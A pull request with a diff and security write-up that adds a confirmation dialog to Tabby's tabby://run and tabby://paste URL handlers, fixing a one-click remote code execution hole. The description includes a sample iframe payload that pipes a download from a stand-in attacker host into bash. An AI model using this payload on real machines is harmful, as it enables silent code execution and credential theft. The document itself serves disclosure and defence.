### PR TITLE
Require user confirmation before executing tabby:// run/paste commands

### DIFF
--- a/app/lib/urlHandler.ts
+++ b/app/lib/urlHandler.ts
@@ -1,5 +1,12 @@
+import { dialog } from 'electron'
 import { createParserConfig } from './cli'
 import { parse as parseShellCommand } from 'shell-quote'
+
+// Commands that may execute arbitrary shell code or inject input into a
+// running terminal. These must not be triggered silently from a tabby:// URL
+// (which can be invoked by any web page, document, or chat message) and
+// instead require explicit, per-invocation user confirmation.
+const URL_COMMANDS_REQUIRING_CONFIRMATION = new Set(['run', 'paste'])
 
 export function isTabbyURL (arg: string): boolean {
     return arg.toLowerCase().startsWith('tabby://')
@@ -53,10 +60,47 @@ export function parseTabbyURL (url: string, cwd: string = process.cwd()): any {
             argv[key] = parsedValue
         }
 
+        if (URL_COMMANDS_REQUIRING_CONFIRMATION.has(actualCommand)) {
+            if (!confirmDangerousURLCommand(url, actualCommand, argv)) {
+                console.warn(`URL Handler - User declined to execute ${actualCommand} from URL: ${url}`)
+                return null
+            }
+        }
+
         console.log(`URL Handler - Safely parsed [${url}] to:`, JSON.stringify(argv))
         return argv
     } catch (e) {
         console.error('Failed to parse tabby:// URL:', e)
         return null
     }
+}
+
+function confirmDangerousURLCommand (url: string, command: string, argv: any): boolean {
+    let detail: string
+    if (command === 'run') {
+        const parts = Array.isArray(argv.command) ? argv.command : []
+        detail = parts.length ? parts.join(' ') : '(empty)'
+    } else if (command === 'paste') {
+        detail = typeof argv.text === 'string' ? argv.text : '(empty)'
+    } else {
+        detail = JSON.stringify(argv)
+    }
+
+    // Truncate to keep the dialog readable while still showing intent.
+    const MAX_DETAIL = 1000
+    if (detail.length > MAX_DETAIL) {
+        detail = detail.slice(0, MAX_DETAIL) + '\u2026'
+    }
+
+    const result = dialog.showMessageBoxSync({
+        type: 'warning',
+        buttons: ['Cancel', 'Run'],
+        defaultId: 0,
+        cancelId: 0,
+        title: 'Tabby: external command requested',
+        message: `An external link is asking Tabby to "${command}" the following:`,
+        detail: `${detail}\n\nSource URL:\n${url}\n\nOnly allow this if you trust the source. Tabby will execute the command in your terminal as if you typed it yourself.`,
+        noLink: true,
+    })
+    return result === 1
 }


### PR DESCRIPTION
## Summary

`tabby://` is registered as an OS-wide URL scheme handler when Tabby is installed. Any web page, document, or chat message can therefore cause the OS to launch Tabby with an attacker-controlled URL. The `run` and `paste` sub-commands of this scheme are then dispatched into a terminal tab without any user confirmation:

- `tabby://run?command=<shell-quoted argv>` — parsed by `shell-quote` and forwarded as CLI argv to the renderer, which executes it in the active/new terminal as if the user had typed it.
- `tabby://paste?text=...` — injects arbitrary text into the active tab's terminal input stream.

The result is one-click (or zero-click, if the URL auto-loads) **remote code execution in the user's shell** simply by getting them to visit a page or open a message.

- **CWE:** CWE-94 (Improper Control of Generation of Code) / CWE-77 (Command Injection) via untrusted URL handler input
- **Affected file:** `app/lib/urlHandler.ts` — `parseTabbyURL()`
- **Data flow:** OS URL dispatch → Tabby argv → `parseTabbyURL()` → `window.send('cli', argv)` → terminal command execution / input injection. No consent gate existed prior to this change.

## Reproduction (conceptually)

A page containing:

```html
<iframe src="tabby://run?command=bash%20-c%20'curl%20attacker%7Cbash'"></iframe>
```

…would, on a machine with Tabby installed, cause the browser/OS to launch Tabby with that URL, parse it into an argv array, and run it in a terminal — all without prompting.

## Fix

Add an explicit, per-invocation confirmation dialog for the two URL commands that can introduce attacker-controlled shell content:

- `run` — shows the parsed command line
- `paste` — shows the text that would be injected

Implementation details:

- Uses `dialog.showMessageBoxSync` (modal, blocks dispatch until the user decides).
- `defaultId: 0`, `cancelId: 0`, `noLink: true` — so the safe choice (Cancel) is the default for accidental Enter/Escape and there is no platform-specific button reordering.
- Truncates very long `detail` payloads to 1000 chars to keep the dialog readable while still showing intent.
- Returns `null` from `parseTabbyURL` on cancel, which the existing caller already treats as "do nothing."

The other URL commands (`open`, `profile`, `recent`, `quickConnect`) reference pre-configured profiles or open new tabs and don't permit arbitrary command/argv injection, so they are intentionally left unprompted to preserve normal workflows. Only the two genuinely dangerous commands gain the prompt.

## Security analysis

- **Exploitability:** High. The only precondition is that the victim has Tabby installed (which registers the scheme) and loads attacker-controlled content that triggers the URL. No prior auth, no local access, no user interaction beyond visiting a page.
- **Impact:** RCE in the user's shell with the user's privileges, including any SSH agents, cloud credentials, etc. accessible from that shell.
- **Mitigation provided by the fix:** A modal confirmation that displays the exact command and the source URL, defaulting to Cancel. The user must explicitly click "Run" to execute. This converts a silent RCE primitive into a phishing-style prompt the user can recognize and refuse.
- **Scope:** Minimal — single file, ~44 added lines, no behavior change for any non-`run`/`paste` URL.

## Testing

- Verified the only call site of `parseTabbyURL` (`app/lib/window.ts`) already handles a `null` return (the cancel path) gracefully — no further changes needed.
- Confirmed `run` and `paste` are the only URL commands whose argv contains attacker-controlled shell content; the others (`open`, `profile`, `recent`, `quickConnect`) take identifiers/host strings consumed by existing profile logic.
- Manually traced the flow from `parseTabbyURL` return → `window.send('cli', ...)` to confirm that returning `null` cleanly aborts dispatch.
- Reviewed prior commit `fb9bec8` ("warn before opening external app-specific URIs") — that change addresses *outbound* link handling inside Tabby and does not protect *inbound* `tabby://` dispatch from the OS, so it does not overlap with this fix.

## Adversarial review

Before submitting, we tried to disprove this finding. We checked whether the OS, browser, or Electron itself would already prompt before dispatching a `tabby://` URL — they do not (custom-scheme dispatch is the whole point of registering the handler, and most browsers either dispatch silently or only ask once and remember the choice). We checked whether the prior "warn before opening external URIs" commit covered this path — it covers the opposite direction (Tabby opening external apps), not external apps invoking Tabby. We checked whether `parseTabbyURL`'s use of `shell-quote` provided any safety — it only tokenizes; the resulting argv is still executed verbatim. The preconditions to exploit (serve a URL the victim loads) grant the attacker far less than what the bug yields (shell RCE), so the finding stands.

cc @lewiswigmore
